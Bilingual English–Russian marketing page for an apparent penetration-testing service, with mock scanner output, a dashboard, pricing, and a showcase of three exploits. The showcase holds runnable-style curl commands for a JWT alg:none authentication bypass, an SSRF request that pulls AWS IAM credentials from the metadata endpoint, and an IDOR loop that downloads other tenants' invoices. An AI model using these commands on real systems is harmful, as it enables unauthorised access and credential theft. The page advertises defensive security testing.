Nullify Network Nullify Network Red Team Testing Red Team Тестирование

Next-generation security
Nullify Network Next-generation security
Nullify Network

Scan your domain and identify real issues — open subdomains, header leaks, configuration errors, vulnerabilities, and business logic flaws. Сканируйте домен и находите реальные проблемы — открытые сабдомены, ошибки конфигурации, уязвимости и ошибки бизнес-логики.

nullify-scanner — yourdomain.com
$nullify scan yourdomain.com
DNS resolved · IP 185.74.12.44 · probing...
Subdomains found: api.yourdomain.com, admin.yourdomain.com, staging.yourdomain.com
HTTPS redirect: yes
SSL cert expires in 14 days
Server header leaks version: nginx/1.18.0
Missing headers: CSP, X-Frame-Options, HSTS
! HIGH severity: SQL Injection in /api/search · CVSS 9.8
! CRITICAL: Auth bypass via JWT alg=none · CVSS 9.4
# 2 critical findings blurred — contact us for full report
Detected threatsВыявленные угрозы

Real exploits discovered during security testingРеальные эксплойты, выявленные в ходе тестирования

These aren't theoretical examples. Every technique below has been found and exploited in production systems by our team, with proof attached.Реальные кейсы из пентест-практики: каждый метод выявлен и подтверждён в продакшене с доказательствами эксплуатации.

CRITICAL CVSS 9.4 · CWE-287
Authentication bypass via JWT alg:noneОбход аутентификации через JWT alg:none
API endpoint · no auth requiredAPI-endpoint · без аутентификации
# forge a token with alg=none, any payload
header=eyJhbGciOiJub25lIn0 # {"alg":"none"}
payload=eyJzdWIiOiIxIiwicm9sZSI6ImFkbWluIn0
curl -H "Authorization: Bearer $header.$payload." \
  https://api.target.com/admin/users
→ 200 OK
[{"id":1,"email":"[email protected]","role":"admin"},...]

The API accepted tokens with algorithm set to "none", bypassing signature verification entirely. All authenticated endpoints were accessible without credentials.API принимал токены с алгоритмом "none", полностью обходя проверку подписи. Все защищённые эндпоинты были доступны без учётных данных.

CRITICAL CVSS 9.1 · CWE-918
SSRF → AWS metadata → credentials theftSSRF → метаданные AWS → кража ключей
/api/proxy · internal network access/api/proxy · доступ к внутренней сети
# redirect proxy to cloud metadata endpoint
curl -H "Authorization: Bearer $T" \
  "https://api.target.com/api/proxy?url=http://169.254.169.254
    /latest/meta-data/iam/security-credentials/prod-role"
→ 200 OK
{"AccessKeyId":"ASIA...","SecretAccessKey":"wJal...",
 "Token":"FwoGZXIvYXdzEJT...","Expiration":"..."}

Webhook URL parameter was fetched server-side with no allowlist. We retrieved live AWS IAM credentials giving full access to S3, DynamoDB, and EC2.URL параметр вебхука запрашивался на сервере без белого списка. Мы получили живые IAM-ключи AWS с полным доступом к S3, DynamoDB и EC2.

CRITICAL CVSS 9.8 · CWE-639
IDOR — cross-tenant data accessIDOR — межарендный доступ к данным
Billing API · any user → any invoiceBilling API · любой пользователь → любой инвойс
# enumerate invoices of other orgs
for id in $(seq 9000 9500); do
  curl -s -H "Authorization: Bearer $T" \
    https://billing.target.com/api/invoices/$id/pdf \
    -o invoice_$id.pdf -w "%{http_code}\n"
done
→ 200 OK × 312 (invoices from 47 orgs dumped)

Invoice IDs were sequential integers with no org scope check. A single user account was enough to download invoices belonging to hundreds of organizations.ID инвойсов — последовательные числа без проверки принадлежности к организации. Одного аккаунта хватило, чтобы скачать инвойсы сотен компаний.

These are actual finding types from our pentest reports. We deliver proof-of-exploit for every vulnerability.Мы не предупреждаем об уязвимостях — мы их доказываем.

Our approachНаш подход
Security checkПроверка безопасности

Identify vulnerabilities in your systemОбнаружьте уязвимости в вашей системе

Enter your domain and get a report of detected vulnerabilities: subdomains, SSL, server, security headers, and infrastructure configuration. Full results available after ownership verification.Введите домен и получите то, что видит атакующий до первого запроса. Глубокий анализ инфраструктуры, субдоменов и заголовков безопасности. Полный отчёт — после верификации.

yourdomain.comyourdomain.com
Scanning
IP185.74.12.44
HTTP status200 OK
HTTPS rediryes ✓
TLSTLSv1.3
Cert issuerLet's Encrypt
Cert expires14 days ⚠
Servernginx/1.18.0 ⚠
X-Powered-ByExpress ⚠
HSTSmissing ✗
CSPmissing ✗
X-Frame-Optmissing ✗
Subdomainsapi · admin · staging
ResultsResults
CRIT
3
HIGH
8
LOW
4
Low risk — visibleНизкий риск — доступно
LOW SSL cert expires in 14 daysSSL-сертификат истекает через 14 дней CWE-295
LOW Server version in header (nginx/1.18.0)Версия сервера в заголовке (nginx/1.18.0) CWE-200
LOW Missing X-Frame-Options / frame-ancestorsОтсутствует X-Frame-Options CWE-1021
LOW Missing Referrer-Policy headerОтсутствует Referrer-Policy CWE-116
Higher severity — lockedВысокий риск — заблокировано
HIGH SQL Injection in /api/search parameter CVSS 9.8
CRIT Authentication bypass via JWT alg=none CVSS 9.4
CRIT Unauthenticated admin panel exposed CVSS 9.8

Unlock full results — verify domain ownership to see all critical findings.Разблокируйте полные результаты — подтвердите владение доменом, чтобы увидеть все критические находки.

See full reportПолный отчёт
Security DashboardSecurity Dashboard

Security Control CenterПанель безопасности

Total control over your attack surface. Security score, infrastructure map, proven vulnerabilities, live threat statistics and AI assistant — every vector under surveillance.Полный контроль над поверхностью атаки. Оценка безопасности, карта инфраструктуры, уязвимости с доказательствами, живая статистика угроз и ИИ-ассистент — каждый вектор под наблюдением.

nullify.network · Security Dashboard
Live
Acme Corp
Overview
Pentests
Vulnerabilities
Domains
Networks
Patches
Settings
Security DashboardПанель безопасности
Last 30d ▾ + New scan
Security ScoreОценка безопасности
0
43
AT RISK
↓ from 61
Validated FindingsПодтверждённые уязвимости
CRIT
3
HIGH
8
MED
12
Assets MonitoredАктивы под наблюдением
0
subdomains & IPsсубдоменов и IP
Active ScansАктивные сканы
4
api.acmecorp.com
Network MapКарта сети 9 nodes
Recent ScansПоследние сканы Live
Enterprise

Security for complex infrastructure
White box and Black box audit
Ни одна точка входа не остаётся непроверенной

Manual testing with AI automation and data interpretation: subdomain discovery, patch recommendations, and integrations — tailored to your stack.Black-Box — периметр глазами противника. White-Box — архитектура, код, бизнес-логика изнутри. Red Team методология и AI-автоматизация — конкретный план устранения под ваш стек.

Manual pentest by our security teamРучное тестирование нашей командой

Real hackers, not just automated scanners. Our team attacks your system the way real adversaries would — and delivers a full report with exploits.Реальные хакеры, а не только автоматические сканеры. Наша команда атакует вашу систему так, как это делают настоящие злоумышленники.

Subdomain discovery & network mappingРазведка субдоменов и инфраструктуры

We expand the attack scope to the maximum: open subdomains, services, DNS records, and internal nodes — with full visibility and analysis in the dashboard.Мы расширяем скоуп атаки до максимума: открытые субдомены, сервисы, DNS-записи и внутренние узлы — с полным отображением и анализом в дашборде.

Unique reports with recommendations and PoCУникальные отчёты с рекомендациями и PoC

Full results, reproduction steps, and fixes. Reports are automatically generated during AI scanning and manual pentesting and are instantly available in the dashboard — no need to contact support.Каждое сканирование — готовый отчёт. AI формирует его автоматически: уязвимости, PoC, шаги воспроизведения и план исправления. Доступно в дашборде без лишних запросов.

Zero data retention & self-hosted optionZero data retention и self-hosted

All data and results remain within your infrastructure. Deployment in your VPC with full control. Все данные и результаты остаются внутри вашей инфраструктуры. Деплой — в вашем VPC с полным контролем.

Book a demoПодробнее
PricingТарифы

Plans built around
your security needs Тарифы под задачи
вашей безопасности

From automated scanning to full manual pentest and enterprise programs — one vendor, transparent pricing. От автоматического сканирования до ручного пентеста и enterprise-программ — один поставщик, прозрачные условия.

AutomatedАвтоматически
Scanner
24/7 AI-driven monitoring of your attack surface. Непрерывный AI-мониторинг поверхности атаки.
  • Subdomain & header analysisАнализ сабдоменов и заголовков
  • No agent requiredБез агента, быстрый старт
  • Continuous 24/7 coverageМониторинг 24/7
See planПосмотреть
ManualРучной
Pentest
Certified engineers simulate real attacks. Сертифицированные инженеры имитируют реальные атаки.
  • Manual exploit validationРучная валидация эксплойтов
  • Proof-of-exploit reportsОтчёты с PoC
  • Remediation guidanceРекомендации по исправлению
See planПосмотреть
Full-stackКомплексный
Enterprise
Scanner + pentest + dedicated security engineer. Сканер + пентест + выделенный инженер безопасности.
  • Dedicated security engineerВыделенный инженер
  • Custom SLA & complianceКастомный SLA и соответствие требованиям
  • No limits, full coverageБез ограничений
Contact usСвязаться
View all plans Все тарифы Talk to us first Сначала поговорим

Your domain is being scanned
by someone right now.Прямо сейчас кто-то
сканирует ваш домен.

Find out what they see before they act on it.Узнайте, что они могут увидеть, раньше чем это будет использовано против вас.

Start free scanПопробуйте сейчас Talk to us →Поговорить с нами →